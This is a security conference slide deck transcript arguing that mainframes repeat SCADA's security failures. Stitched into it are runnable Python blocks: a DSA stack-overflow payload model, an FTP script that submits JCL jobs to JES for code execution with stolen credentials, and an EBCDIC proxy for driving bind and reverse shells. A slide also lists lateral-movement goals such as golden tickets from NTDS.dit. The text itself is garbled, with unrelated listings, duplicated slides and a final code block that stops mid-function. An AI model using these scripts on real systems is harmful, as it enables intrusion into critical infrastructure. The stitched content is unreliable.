A STUXNET FOR MAINFRAMES
Cheryl Biswas
• Security researcher/analyst Threat Intel
• APTs, Mainframes, ICS SCADA, Shadow IT, StarTrek
• BSidesLV, Circle City, BSidesT0, SecTor, Hackfest, TiaraCon
• https://whitehatcheryl.wordpress.com
• Twitter: @3ncr1pt3d
DISCLAIMER: The views represented here are solely her own and not those of
her employers, past or present.
11/4/2016@3ncr1pt3d A Stuxnet For Mainframes
HEAD IN THE SAND DEFENCE
YOU SAY SCADA
WE SAY … MAINFRAMES
MOM!! THE INTERNET IS BROKEN
INTRO
In the beginning
There were mainframes
And it was good.
Then came Scada. And it was good too.
CONGRATULATIONS! IT’S A ... PLC
BUT THEN CAME
...
WHAT IS
SCADA
I CAN’T LIVE ...
IF LIVING IS WITHOUT YOU
DOES NOT
PLAY WELL
WITH OTHERS
WHAT ARE MAINFRAMES?
MAINFRAMES … RIGHT?
THESE ARE NOT THE MAINFRAMES YOU’RE LOOKING FOR
THIS AIN’T YOUR GRANDMA’S MAINFRAME
MAINFRAMES - BUILT TO LAST
• High Availability
• Longevity
• Virtualization
• The ability to offload to separate engines
• Backward compatibility with older software
• Massive Throughput
https://en.wikipedia.org/wiki/Mainframe_computer
SCADA                         MAINFRAME
❏ Culture                     ❏ Culture
❏ Security Approach           ❏ Security Approach
❏ Perceptions                 ❏ Perceptions
❏ Built to Last               ❏ Built to Last
❏ Closed off                  ❏ Closed off
❏ Does not play well          ❏ Does not play well
  with others                   with others
Innovation
Disruption
Would you like some security with that?
SECURITY BASICS WE KEEP GETTING WRONG
❏ Passwords
❏ Encryption
❏ Access
❏ Patching
http://blog.senr.io/blog/unique-snowflakes-or-ubiquitous-tech-the-truth-behind-the-industrial-internet-of-things-iiot
ICS / SCADA - WHAT HAVE WE LEARNED?
"NONE OF OUR SCADA OR ICS EQUIPMENT IS ACCESSIBLE FROM THE INTERNET."
O RLY?
PROJECT SHINE
1,000,000 SCADA / ICS DEVICES FOUND ONLINE
SCADA ATTACK VECTORS
SCADA ATTACKS
Malicious Trojan
http://www.risidata.com/Database
SCADA ATTACKS
Stolen equipment
http://www.risidata.com/Database
SCADA ATTACKS
Social Engineering
http://www.risidata.com/Database
SCADA - JUMPING AIR GAPS
• Acoustic modem originally designed for underwater communication
• Near-ultrasonic frequencies
• Remote key logging relayed over multiple hops
http://www.jocm.us/index.php?m=content&c=index&a=show&catid=124&id=600
MAINFRAMES & SCADA - THE LINKS
• Similar in Culture
• Lack of security
• Perceived as secure
• “Air Gapped”
• “See no evil” – cuz you don’t see it if you aren’t looking
BUT IT’S AIR GAPPED
“Mainframe modernization or exposing the classic system of record data to new services means that the data is no longer isolated on the mainframe – the world is now “unknown, unknown.” We have lost sight and control of where the data is going the minute we try to harness mainframe data for other purposes than batch or transaction applications.”
zOS Expert
MAINFRAME - LACK OF ATTACK DATA
Because … What you don’t see won’t hurt you
CULTURE
http://mainframed767.tumblr.com/post/79167015212/please-dont-post-on-mainframe-forums?is_related_post=1
MAINFRAME EXPLOIT RESEARCH
MAINFRAME - EXPLOIT RESEARCH
Bigendiansmalls
https://www.bigendiansmalls.com/category/security/exploit-development/
MAINFRAME - NMAP
Nmap can now detect mainframe ports
Mainframe banners are not static
Mainframes are now more accessible to others for hacking
http://mainframed767.tumblr.com/post/132669411918/mainframes-and-nmap-together-at-last
http://mainframed767.tumblr.com/post/47105571997/nmap-script-to-grab-mainframe-screens
MAINFRAMES - BIND SHELLCODE
Mainframe assembler
EBCDIC to ASCII converter
Connect with NetCat
https://www.bigendiansmalls.com/mainframe-bind-shell-source-code/
ASCII TO EBCDIC
EBCDIC TO ASCII
LETS GET TECHNICAL
MAINFRAMES - STACK BUT DIFFERENT
▪The mainframe function prologue creates a Dynamic Storage Area (DSA) rather than an x86-style frame
▪The DSA pointer points to the next free byte of the storage being used as a stack
▪Nothing is subtracted from ESP to allocate space; there is no ESP
▪A general-purpose register is used as the stack pointer (Language Environment uses R13 by convention)
▪The hardware does not force any register to play that role
https://www.bigendiansmalls.com/smashing-the-zos-le-daisy-chain-for-fun-and-cease-and-desist-letters-guest-post-2/
ALLOCATION OF MEMORY - FUNCTION PROLOGUE
[Diagram: x86 stack on a call from main(). The return address (IP) and the saved frame pointer (SFP, the caller's EBP) are pushed; ESP points just below them, at the 0x8012345 / 0x8012344 / 0x8012343 labels in the picture.]
ALLOCATION MEMORY - FUNCTION PROLOGUE
[Diagram: the called function() then subtracts from ESP (ESP - 28) to allocate its local memory beneath the saved EBP.]
ALLOCATION MEMORY - FUNCTION EPILOGUE
[Diagram: function() restores EBP from the SFP, ESP climbs back to the main() frame and execution resumes at the saved IP.]
ALLOCATION MEMORY - DSA PROLOGUE
[Diagram: on z/OS the "called" function gets a Dynamic Storage Area instead. It holds a save area and a pointer to the caller's original DSA; the DSA is not the stack, so the saved-frame-pointer picture above is "not gonna happen."]
HOW TO EXPLOIT - STRING EXPLOITATION != WIN
Always aware of length
[Diagram: two strings, each carrying its own Length field.]
https://www.bigendiansmalls.com/smashing-the-zos-le-daisy-chain-for-fun-and-cease-and-desist-letters-guest-post-2/
MAINFRAMES - UNIQUE TO EXPLOIT
S0C1 Exception
http://mainframed767.tumblr.com/post/136886215917/guest-post-jan-cannaerts-smashing-the-zos-le
[Diagram: a run of AAAA... overflows memory containing data, with no size checking. The overflow causes execution to branch to another memory location, where the bytes are read as opcodes; when the opcode does not exist, the result is an S0C1 exception.]
MAINFRAMES - UNIQUE TO EXPLOIT
S0C1 Exception
http://mainframed767.tumblr.com/post/136886215917/guest-post-jan-cannaerts-smashing-the-zos-le
[Diagram: the DSA daisy chain. DSA Level 0 is followed by DSA 1 and DSA 2; each level returns to the one before it through Register 14, the return pointer (RP).]
MAINFRAMES - UNIQUE TO EXPLOIT
Globally addressed arrays
S0C1 Exception
http://mainframed767.tumblr.com/post/136886215917/guest-post-jan-cannaerts-smashing-the-zos-le
[Diagram: DSA 1, DSA 2 and DSA 3 chained, Register 14 = RP. The procedure that should return to Level 1 actually executes code in DSA 2, because the overflow has changed the saved return pointer.]
MAINFRAMES - INSECURITY OF MEMORY
Memory not more secure than Windows or Unix.
No “DEP”
No strict ASLR
http://mainframed767.tumblr.com/post/136886215917/guest-post-jan-cannaerts-smashing-the-zos-le
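To make the three S0C1 slides concrete, the Python model below (an added illustration, not code from the talk, from Bigendiansmalls or from the linked guest post) lays out three chained DSAs the way the diagrams do: a 72-byte standard register save area with the saved R14 at +12, followed by the routine's local field. The field size, the addresses, the `BCR 15,14` stub that stands in for "code" and the tiny opcode table are assumptions for the demo; the real z/Architecture decode is far larger. An unchecked MVC-style copy of EBCDIC A's (0xC1) runs off the field into the next DSA's save area. A payload that only sprays A's sends the return into storage the program does not own (S0C4); one that lands a pointer back at the field makes the return branch into the data, where 0xC1 is not an opcode: S0C1.

```python
"""Toy model of the LE DSA daisy chain from the S0C1 slides (added illustration).

Each routine's DSA sits directly after its caller's: a standard 72-byte register
save area (saved R14, the return address, at +12) followed by the routine's
locals.  Field size, addresses and the opcode table below are assumptions."""
import struct

SAVE_AREA_LEN = 72          # standard MVS save area: 18 fullwords
R14_OFFSET = 12             # saved R14 is the fourth fullword of the save area
BUF_LEN = 16                # assumed size of a local character field in the DSA
DSA_LEN = SAVE_AREA_LEN + BUF_LEN
BASE = 0x00021000           # assumed address of DSA level 0
CODE = BASE + 0x300         # assumed address of the routines' code
MEM_LEN = 0x400

# Constructed subset of real z/Architecture first-byte opcodes (the full decode is far larger).
KNOWN_OPCODES = {0x07: "BCR", 0x0A: "SVC", 0x18: "LR", 0x41: "LA",
                 0x47: "BC", 0x50: "ST", 0x58: "L"}


class LeStack:
    """Chained DSAs (level 0 = main) plus a small code area, in one flat bytearray."""

    def __init__(self, levels=3):
        self.mem = bytearray(MEM_LEN)
        for lvl in range(levels):
            # Each routine's "code" is just BCR 15,14 (0x07FE): return to the caller.
            off = CODE - BASE + 4 * lvl
            self.mem[off:off + 2] = b"\x07\xfe"
            # The save area at the top of DSA n records where level n returns to in level n-1.
            if lvl > 0:
                self.set_saved_r14(lvl, CODE + 4 * (lvl - 1))

    def buf_addr(self, lvl):
        """Address of the local field inside DSA `lvl` (the save area comes first)."""
        return BASE + lvl * DSA_LEN + SAVE_AREA_LEN

    def set_saved_r14(self, lvl, addr):
        off = lvl * DSA_LEN + R14_OFFSET
        self.mem[off:off + 4] = struct.pack(">I", addr)

    def saved_r14(self, lvl):
        off = lvl * DSA_LEN + R14_OFFSET
        return struct.unpack(">I", self.mem[off:off + 4])[0]

    def move_unchecked(self, lvl, data):
        """MVC-style copy: the length comes from the source, the field size is never consulted."""
        off = self.buf_addr(lvl) - BASE
        self.mem[off:off + len(data)] = data

    def move_checked(self, lvl, data):
        """Same copy with the destination length enforced; the check has to be written by hand."""
        if len(data) > BUF_LEN:
            raise ValueError("source is %d bytes, field holds %d" % (len(data), BUF_LEN))
        self.move_unchecked(lvl, data)

    def execute_return(self, lvl):
        """Model level `lvl` returning through its saved R14; report what the CPU would do."""
        off = self.saved_r14(lvl) - BASE
        if not 0 <= off < MEM_LEN:
            return "S0C4"                                   # branch into storage we do not own
        return KNOWN_OPCODES.get(self.mem[off], "S0C1")     # unknown opcode: operation exception


def overflow_payload(stack, lvl):
    """EBCDIC 'A' (0xC1) through the field and the next save area, then a pointer
    back at the field so the return lands on the A's themselves."""
    return b"\xc1" * (BUF_LEN + R14_OFFSET) + struct.pack(">I", stack.buf_addr(lvl))


def demo():
    """Clean return, return after an A-only spray, return after the pointer payload."""
    clean = LeStack().execute_return(2)
    sprayed = LeStack()
    sprayed.move_unchecked(1, b"\xc1" * (BUF_LEN + R14_OFFSET + 4))
    smashed = LeStack()
    smashed.move_unchecked(1, overflow_payload(smashed, 1))
    return clean, sprayed.execute_return(2), smashed.execute_return(2)


if __name__ == "__main__":
    print(demo())    # ('BCR', 'S0C4', 'S0C1')
```

Run it directly to see the clean return, the sprayed return and the smashed return side by side. `move_checked` is the whole defence: an MVC takes its length from the instruction, not from the destination field, so the size check the slide says is missing has to be written by the programmer.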
ACCESSIBLE TO YOU!
FTP EXPLOIT
exploit/mainframe/ftp/ftp_jcl_creds
MAINFRAME - FIRST METASPLOIT MODULE
Poorly configured FTP server.
FTP -> Shell
https://www.bigendiansmalls.com/a-logical-first-step/
FTP METASPLOIT MODULE
ARCH_CMD              Executes a command, or uses a command to give a shell
Platform: Mainframe   Uses the Mainframe payloads of Metasploit
Target Automatic      Only works with IBM FTP CS V.R.
Requires Credentials  Credentials allow a file to be uploaded
Debugging enabled     Can enable Verbose and FTPdebug
https://www.bigendiansmalls.com/a-logical-first-step/
https://www.rapid7.com/db/modules/exploit/mainframe/ftp/
FTP METASPLOIT MODULE
Checks Banner
If banner correct, logs in and uploads file
File is uploaded as JOB & executes
https://www.bigendiansmalls.com/a-logical-first-step/
GENERIC JCL TEST FOR MAINFRAME EXPLOITS
This can be used as a template for other JCL based payloads
https://www.rapid7.com/db/modules/payload/cmd/mainframe/generic_jcl
https://www.bigendiansmalls.com/a-logical-first-step/
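The Python below is an added illustration of the flow those two slides describe (it is not the Metasploit module's code and not from bigendiansmalls.com): check the banner for IBM FTP CS, build a generic IEFBR14 test job that respects JCL's 8-character jobnames and 72-column records, then, with credentials, switch the session to `SITE FILETYPE=JES` and `STOR` the job so the FTP server hands it to JES. The sample banner and JES reply are constructed, `CLASS=A,MSGCLASS=H` and the `TEST.JCL` name are assumptions, and the exact wording of the job-id reply may differ between releases.

```python
"""Banner check, generic JCL test job and JES submission over FTP (added illustration)."""
import io
import re
from ftplib import FTP

# Constructed sample of the z/OS FTP greeting the module keys on.
SAMPLE_BANNER = (
    "220-FTPD1 IBM FTP CS V2R1 at MVS1.EXAMPLE.COM, 10:15:02 on 2016-11-04.\n"
    "220 Connection will close if idle for more than 5 minutes."
)
# Constructed sample of the STOR reply once FILETYPE=JES is in effect.
SAMPLE_JES_REPLY = "250-It is known to JES as JOB01234\n250 Transfer completed successfully."

BANNER_RE = re.compile(r"IBM FTP CS V(\d+)R(\d+)")
JOBID_RE = re.compile(r"known to JES as (J(?:OB)?\d+)")
JOBNAME_RE = re.compile(r"[A-Z@#$][A-Z0-9@#$]{0,7}")      # JCL jobname rules


def ibm_ftp_version(banner):
    """Return (version, release) when the banner is IBM Communications Server FTP, else None."""
    m = BANNER_RE.search(banner)
    return (int(m.group(1)), int(m.group(2))) if m else None


def build_test_jcl(jobname, account="ACCT", program="IEFBR14"):
    """A harmless generic job: IEFBR14 does nothing and ends RC=0, which is enough to
    prove that whatever you STOR is being executed by JES.  CLASS and MSGCLASS are
    site dependent and assumed here."""
    if not JOBNAME_RE.fullmatch(jobname):
        raise ValueError("jobname must be 1-8 chars of A-Z 0-9 @ # $ and not start with a digit")
    lines = [
        "//%-8s JOB (%s),'GENERIC TEST',CLASS=A,MSGCLASS=H" % (jobname, account),
        "//STEP1    EXEC PGM=%s" % program,
        "//",
    ]
    for line in lines:
        if len(line) > 72:          # JCL statements must fit within columns 1-72
            raise ValueError("JCL statement exceeds 72 columns: %r" % line)
    return "\n".join(lines) + "\n"


def jes_jobid(reply):
    """Pull the JES job id out of the STOR reply, or None if JES did not take the job."""
    m = JOBID_RE.search(reply)
    return m.group(1) if m else None


def submit_via_jes(host, user, password, jcl, port=21):
    """The sequence the module performs: banner check, login, SITE FILETYPE=JES, STOR.
    Everything uploaded this way runs as a batch job under the FTP user's authority,
    so these credentials are code execution on the LPAR."""
    ftp = FTP()
    ftp.connect(host, port, timeout=10)
    try:
        if ibm_ftp_version(ftp.getwelcome()) is None:
            raise RuntimeError("not an IBM FTP CS banner, refusing to continue")
        ftp.login(user, password)
        ftp.sendcmd("SITE FILETYPE=JES")
        # ASCII mode: the server translates the job to EBCDIC before JES sees it.
        reply = ftp.storlines("STOR TEST.JCL", io.BytesIO(jcl.encode("ascii")))
    finally:
        ftp.close()
    jobid = jes_jobid(reply)
    if jobid is None:
        raise RuntimeError("JES did not acknowledge the job: %r" % reply)
    return jobid


if __name__ == "__main__":
    import sys
    # usage: python jes_submit.py <host> <user> <password>
    print(submit_via_jes(sys.argv[1], sys.argv[2], sys.argv[3], build_test_jcl("TESTJOB1")))
```

The defender's reading is the one the module makes for you: an FTP account that is permitted `FILETYPE=JES` is a batch-job execution account, whatever the "poorly configured FTP server" was meant for.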
Z/OS (MVS) COMMAND SHELL, REVERSE TCP
Creates a reverse shell. This implementation does not include EBCDIC character translation, so a client with translation capabilities is required. MSF handles this automatically.
https://www.rapid7.com/db/modules/exploit/mainframe/ftp/ftp_jcl_creds
https://www.bigendiansmalls.com/mainframe-bind-shell-sourc
GENERIC COMMAND SHELL
Connect back to attacker and spawn a command shell
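Both the bind shell from the earlier "MAINFRAMES - BIND SHELLCODE" slide (an EBCDIC to ASCII converter between netcat and the mainframe) and the reverse shell described here leave the translation to the client. The Python below is an added example, not the converter from the talk or the Metasploit handler. It uses the standard library's cp037 code page (IBM-1047, which z/OS UNIX actually uses, is not in the standard library, but agrees with cp037 on letters, digits and space), folds the z/OS line end 0x15 to and from `\n`, offers a quick check for an untranslated stream, and runs as a local proxy you point netcat at. The proxy's arguments and listening address are assumptions.

```python
"""ASCII <-> EBCDIC translation for a z/OS shell that does not translate (added example)."""
import socket
import threading

CODEPAGE = "cp037"       # stdlib EBCDIC page; IBM-1047 differs only in a few symbols and the line end
EBCDIC_NL = "\x85"       # cp037 decodes byte 0x15, the z/OS UNIX line end, to U+0085


def ascii_to_ebcdic(text):
    """Encode a command typed on the attacker side for a shell that does no translation."""
    return text.replace("\n", EBCDIC_NL).encode(CODEPAGE)      # '\n' becomes 0x15


def ebcdic_to_ascii(data):
    """Decode raw bytes coming back from the mainframe into readable text."""
    return data.decode(CODEPAGE, errors="replace").replace(EBCDIC_NL, "\n")


def looks_like_ebcdic(data):
    """Cheap check for an untranslated stream: printable ASCII sits in 0x20-0x7E,
    EBCDIC letters and digits sit in 0x81-0xF9 and EBCDIC space is 0x40."""
    if not data:
        return False
    ebcdic_ish = sum(1 for b in data if b >= 0x80 or b == 0x40)
    return ebcdic_ish / len(data) > 0.5


def _pump(src, dst, convert):
    """Copy bytes one way between two sockets, translating as they pass."""
    while True:
        chunk = src.recv(4096)
        if not chunk:
            break
        dst.sendall(convert(chunk))
    try:
        dst.shutdown(socket.SHUT_WR)
    except OSError:
        pass


def translating_proxy(listen_port, target_host, target_port):
    """Listen on localhost; what netcat sends goes to the shell as EBCDIC and
    what the shell returns comes back as ASCII."""
    srv = socket.socket()
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(("127.0.0.1", listen_port))
    srv.listen(1)
    client, _ = srv.accept()
    target = socket.create_connection((target_host, target_port))
    to_host = threading.Thread(
        target=_pump, args=(client, target, lambda b: ascii_to_ebcdic(b.decode("ascii", "replace"))))
    to_client = threading.Thread(
        target=_pump, args=(target, client, lambda b: ebcdic_to_ascii(b).encode("ascii", "replace")))
    to_host.start()
    to_client.start()
    to_host.join()
    to_client.join()


if __name__ == "__main__":
    import sys
    # usage: python ebcdic_proxy.py <local_port> <mainframe_host> <bind_shell_port>
    # then:  nc 127.0.0.1 <local_port>
    translating_proxy(int(sys.argv[1]), sys.argv[2], int(sys.argv[3]))
```

`looks_like_ebcdic` is the test to run on the first bytes a raw netcat session returns: if the shell prompt comes back as 0xC1-range bytes rather than text, you are talking to one of these untranslated shells and need the proxy in between.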
HOW THE MIGHTY FALL
BIGENDIAN POC
STUXNET - SCADA
SCADA - STUXNET
• Air Gap bypass
• APT
• C2
• Self erasing
• Specific to system it wants
• Nation State
SCADA - THE THREAT IS REAL
• Dec 2015: power grid attack in Ukraine
• March 2016: ransomware hits a US power company in Michigan
• June 2016: IRONGATE, targeted ICS malware, found while still in its testing stage
CRYSTAL BALL GAZING
We’re here to say history doesn’t need to repeat itself. Especially not when we know how dire the outcome could be. SCADA gives us the lessons we need to learn from and apply to mainframe security. The question now is - will we do it?
THE KEYS TO THE KINGDOM
▪ Obtain Domain admin level creds
▪ Gain a copy of NTDS.dit for Kerberos golden tickets to move freely
▪ Identify the back up and recovery systems, including DRP
▪ Identify the critical data and services. Mission critical
▪ Identify messaging servers
▪ Find and compromise application distribution platforms
HOW TO GET YOUR FEET WET
Researchers to Research
• https://www.bigendiansmalls.com/
• http://mainframed767.tumblr.com/
• Mainframe Assembly: http://www.cbttape.org/ftp/asmbook/alnv200.pdf
HOW TO GET YOUR FEET WET
• Virtualization software to play
• http://www.bsp-gmbh.com/turnkey/
• http://mvs380.sourceforge.net/
https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/mainframe-insecuritites-or-hack-the-gibson-no-really/

Developer Data Modeling Mistakes: From Postgres to NoSQL
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DayH2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
 
Advanced Computer Architecture – An Introduction
Advanced Computer Architecture – An IntroductionAdvanced Computer Architecture – An Introduction
Advanced Computer Architecture – An Introduction
 
"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko"Debugging python applications inside k8s environment", Andrii Soldatenko
"Debugging python applications inside k8s environment", Andrii Soldatenko
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 

A Stuxnet for Mainframes

  • 1. A STUXNET FOR MAINFRAMES
  • 2. Cheryl Biswas • Security researcher/analyst Threat Intel • APTs, Mainframes, ICS SCADA, Shadow IT, StarTrek • BSidesLV, Circle City, BSidesT0, SecTor, Hackfest, TiaraCon • https://whitehatcheryl.wordpress.com • Twitter: @3ncr1pt3d DISCLAIMER: The views represented here are solely her own and not those of her employers, past or present. 11/4/2016 @3ncr1pt3d A Stuxnet For Mainframes
  • 3. HEAD IN THE SAND DEFENCE
  • 4. YOU SAY SCADA WE SAY … MAINFRAMES
  • 5. MOM!! THE INTERNET IS BROKEN
  • 6. INTRO In the beginning There were mainframes And it was good.
  • 7. Then came Scada. And it was good too.
  • 11. I CAN’T LIVE ... IF LIVING IS WITHOUT YOU
  • 16. THESE ARE NOT THE MAINFRAMES YOU’RE LOOKING FOR
  • 17. THIS AIN’T YOUR GRANDMA’S MAINFRAME
  • 18. MAINFRAMES - BUILT TO LAST • High Availability • Longevity • Virtualization • The ability to offload to separate engines • Backward compatibility with older software • Massive Throughput https://en.wikipedia.org/wiki/Mainframe_computer
  • 21. SCADA | MAINFRAME (the same list appears under both headings): ❏ Culture ❏ Security Approach ❏ Perceptions ❏ Built to Last ❏ Closed off ❏ Does not play well with others
  • 24. Innovation Disruption Would you like some security with that?
  • 25. SECURITY BASICS WE KEEP GETTING WRONG ❏ Passwords ❏ Encryption ❏ Access ❏ Patching http://blog.senr.io/blog/unique-snowflakes-or-ubiquitous-tech-the-truth-behind-the-industrial-internet-of-things-iiot
  • 26. ICS / SCADA - WHAT HAVE WE LEARNED?
  • 27. "NONE OF OUR SCADA OR ICS EQUIPMENT IS ACCESSIBLE FROM THE INTERNET." O RLY?
  • 36. SCADA - JUMPING AIR GAPS • Designed for underwater communication • Near ultrasonic frequency • Remote key logging for multiple hops http://www.jocm.us/index.php?m=content&c=index&a=show&catid=124&id=600
  • 38. MAINFRAMES & SCADA - THE LINKS • Similar in Culture • Lack of security • Perceived as secure • “Air Gapped” • “See no evil” – cuz you don’t see it if you aren’t looking
  • 40. BUT IT’S AIR GAPPED “Mainframe modernization or exposing the classic system of record data to new services means that the data is no longer isolated on the mainframe – the world is now “unknown, unknown.” We have lost sight and control of where the data is going the minute we try to harness mainframe data for other purposes than batch or transaction applications.” zOS Expert
  • 41. MAINFRAME - LACK OF ATTACK DATA Because … What you don’t see won’t hurt you
  • 45. MAINFRAME - EXPLOIT RESEARCH Bigendiansmalls https://www.bigendiansmalls.com/category/security/exploit-development/
  • 46. MAINFRAME - NMAP • Can now detect Mainframe ports • Mainframe banners are not static • More accessible to others for hacking http://mainframed767.tumblr.com/post/132669411918/mainframes-and-nmap-together-at-last http://mainframed767.tumblr.com/post/47105571997/nmap-script-to-grab-mainframe-screens
  • 47. MAINFRAMES - BIND SHELLCODE • Mainframe assembler • EBCDIC to ASCII converter • Connect with NetCat https://www.bigendiansmalls.com/mainframe-bind-shell-source-code/ (diagram labels: ASCII TO EBCDIC, ASCII TO EBCDIC, EBCDIC TO ASCII)
  • 49. MAINFRAMES - STACK BUT DIFFERENT ▪ Mainframe prologue creates Dynamic Storage Area ▪ Points to next free byte on the stack used ▪ Does not subtract from ESP to allocate space ▪ Register used as a stack pointer ▪ Not forced to do so. https://www.bigendiansmalls.com/smashing-the-zos-le-daisy-chain-for-fun-and-cease-and-desist-letters-guest-post-2/
  • 50. ALLOCATION OF MEMORY - FUNCTION PROLOGUE (x86 stack diagram: MAIN() calls a function; cells labelled IP, SFP, EBP and ESP at 0x8012343 to 0x8012345)
  • 51. ALLOCATION MEMORY - FUNCTION PROLOGUE (x86 stack diagram: FUNCTION() called from MAIN(); IP and SFP saved, Allocated Memory below them, frame shown as EBP - 28 with ESP moved down)
  • 52. ALLOCATION MEMORY - FUNCTION EPILOGUE (x86 stack diagram: SFP and IP restored, EBP and ESP return to the MAIN() frame)
  • 53. ALLOCATION MEMORY - DSA PROLOGUE (z/OS diagram: function "called" from MAIN() at 0x8012345 receives a Dynamic Storage Area holding a Save Area and a pointer to the original DSA; labelled "DSA NOT STACK")
  • 54. HOW TO EXPLOIT - STRING EXPLOITATION != WIN • Always aware of length • Not gonna happen https://www.bigendiansmalls.com/smashing-the-zos-le-daisy-chain-for-fun-and-cease-and-desist-letters-guest-post-2/ (diagram: each String carries its own Length field; an AAAAAAAAAA overflow attempt is shown being rejected)
  • 55. MAINFRAMES - UNIQUE TO EXPLOIT • S0C1 Exception • No size checking • OPCODE does not exist • Overflow causes execution to branch to another memory location http://mainframed767.tumblr.com/post/136886215917/guest-post-jan-cannaerts-smashing-the-zos-le (diagram: Memory containing Data overwritten with AAAA..., then interpreted as OPCODES)
  • 56. MAINFRAMES - UNIQUE TO EXPLOIT • S0C1 Exception • Register 14 = RP http://mainframed767.tumblr.com/post/136886215917/guest-post-jan-cannaerts-smashing-the-zos-le (diagram: DSA chain with DSA Level 0 and DSA Level 1; DSA 1 returns to DSA 0, DSA 2 hangs off Level 1)
  • 57. MAINFRAMES - UNIQUE TO EXPLOIT • Globally addressed arrays • S0C1 Exception • Register 14 = RP • Procedure returns to Level 1 • Actually executes code in DSA2 http://mainframed767.tumblr.com/post/136886215917/guest-post-jan-cannaerts-smashing-the-zos-le (diagram: DSA 1, DSA 2 and DSA 3 chained across DSA Level 0 and DSA Level 1)
  • 58. MAINFRAMES - INSECURITY OF MEMORY • Memory not more secure than Windows or Unix. • No "DEP" • No strict ASLR http://mainframed767.tumblr.com/post/136886215917/guest-post-jan-cannaerts-smashing-the-zos-le
  • 61. MAINFRAME - FIRST METASPLOIT MODULE Poorly configured FTP server. FTP -> Shell https://www.bigendiansmalls.com/a-logical-first-step/
  • 62. FTP METASPLOIT MODULE • ARCH_CMD: executes a command, or uses a command to give a shell • Platform: Mainframe; uses the Mainframe payloads of Metasploit • Target: Automatic; only works with IBM FTP CS V.R. • Requires Credentials: credentials allow a file to be uploaded • Debugging enabled: can enable Verbose and FTPdebug https://www.bigendiansmalls.com/a-logical-first-step/ https://www.rapid7.com/db/modules/exploit/mainframe/ftp/
  • 63. FTP METASPLOIT MODULE • Checks Banner • If banner correct, logs in and uploads file • File is uploaded as JOB & executes https://www.bigendiansmalls.com/a-logical-first-step/
  • 64. GENERIC JCL TEST FOR MAINFRAME EXPLOITS This can be used as a template for other JCL based payloads https://www.rapid7.com/db/modules/payload/cmd/mainframe/generic_jcl https://www.bigendiansmalls.com/a-logical-first-step/
  • 65. Z/OS (MVS) COMMAND SHELL, REVERSE TCP Creates a reverse shell. This implementation does not include EBCDIC character translation, so a client with translation capabilities is required. MSF handles this automatically. https://www.rapid7.com/db/modules/exploit/mainframe/ftp/ftp_jcl_creds https://www.bigendiansmalls.com/mainframe-bind-shell-sourc
  • 66. GENERIC COMMAND SHELL Connect back to attacker and spawn a command shell
  • 68. BIGENDIAN POC
  • 72. SCADA - STUXNET • Air Gap bypass • APT • C2 • Self erasing • Specific to system it wants • Nation State
  • 73. SCADA - THE THREAT IS REAL • Dec 2015 power grid attack in Ukraine • March 2016 Ransomware hits US power company in Michigan • June 2016 Irongate targeted ICS malware in testing stage
  • 75. We’re here to say history doesn’t need to repeat itself. Especially not when we know how dire the outcome could be. Scada gives us the lessons we need to learn from and apply to mainframe security. The question now is - will we do it?
  • 79. THE KEYS TO THE KINGDOM ▪ Obtain Domain admin level creds ▪ Gain a copy of NTDS.dit for Kerberos golden tickets to move freely ▪ Identify the back up and recovery systems, including DRP ▪ Identify the critical data and services. Mission critical ▪ Identify messaging servers ▪ Find and compromise application distribution platforms
  • 82. HOW TO GET YOUR FEET WET Researchers to Research • https://www.bigendiansmalls.com/ • http://mainframed767.tumblr.com/ • Mainframe Assembly • locally http://www.cbttape.org/ftp/asmbook/alnv200.pdf
  • 83. HOW TO GET YOUR FEET WET • Virtualization software to play • http://www.bsp-gmbh.com/turnkey/ • http://mvs380.sourceforge.net/ • https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/mainframe-insecuritites-or-hack-the-gibson-no-really/
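Slides 46, 47 and 65 all turn on the same point: text coming off a z/OS host (nmap-grabbed screens, FTP banners, shell output) is EBCDIC, and a client or log parser needs translation before it can read or alert on it. The example below is added here and is not code from the deck or from the bigendiansmalls tooling; it assumes IBM code page 037 (Python's built-in "cp037" codec), adds a heuristic for telling an EBCDIC capture from an ASCII one, and uses a constructed sample banner.

```python
"""EBCDIC <-> ASCII translation for text captured from a z/OS host.

Added example. Assumes IBM code page 037 (Python codec "cp037"), the usual
US-English EBCDIC code page on z/OS; a site may run another EBCDIC page.
The sample banner at the bottom is constructed, not a real capture.
"""

EBCDIC_CODEC = "cp037"  # assumption: CP037


def ascii_to_ebcdic(text: str) -> bytes:
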